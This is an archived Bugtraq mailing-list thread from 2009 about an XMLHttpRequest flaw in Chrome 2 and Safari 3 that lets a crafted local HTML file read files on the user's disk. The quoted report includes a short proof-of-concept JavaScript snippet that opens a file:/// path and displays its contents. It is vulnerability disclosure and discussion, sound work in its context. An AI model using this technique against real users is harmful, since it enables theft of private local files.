[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <10e6de610906091221w1d531c57g9641c224f569d3e8@mail.gmail.com>
Date: Tue, 9 Jun 2009 20:21:32 +0100
From: "Adrian P." <ap@...citizen.org>
To: pantera_bleed@...mail.com
Cc: bugtraq@...urityfocus.com
Subject: Re: XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3
it's always been possible to steal local files if you can convince a
user to open a "harmless" html file from their local filesystem. this
is possible because the scripting code runs within local context (in
FF terminology - not sure what Safari calls it).
last time i checked [1] [2] FF didn't even issue a warning when
opening a local file with scripting code in it, although i haven't
checked in the case of Safari
[1] http://www.gnucitizen.org/blog/web-pages-from-hell-2/
[2] http://marc.info/?l=bugtraq&m=116386919506057&w=2
On Tue, Jun 9, 2009 at 5:33 PM, <pantera_bleed@...mail.com> wrote:
>
> .html can be crafted to force a unaware user to read file from local, and then possibly send it to a server.
>
> var method = "GET"
> var URL = "file:///C:/argentina/bsas_junin.txt"
> xmlhttp.open( method, URL, true)
>
> This type of request is possible if file is on user local in the user hard disk (CHROME2), in other browser I was able to do the same but with a LAN access to file, no need to write in local hard disk (SAFARI3)
>
>
> if (xmlhttp != null) {
> xmlhttp.open( method, URL, true)
> xmlhttp.onreadystatechange=function(){
> if (xmlhttp.readyState==4) {
> alert(URL + "\n\n" + xmlhttp.responseText)
> }
> }
> }
>
> this is a valid operation javascript can read then xmlhttp.responseText, yes the file content.
>
> After this you can do whatever you want whit the file.
>
> note that you MUST know the file path!!
>
> crafted by: federico.lanusse
> pantera_bleed@...mail.com
> federico.lanusse@...rolab.com
>
> company: clarolab QA team
> yeah! lets rock Ateam!!
>
> Chrome ISSUE, with attached POC.
> http://code.google.com/p/chromium/issues/detail?id=13671
>
Powered by blists - more mailing lists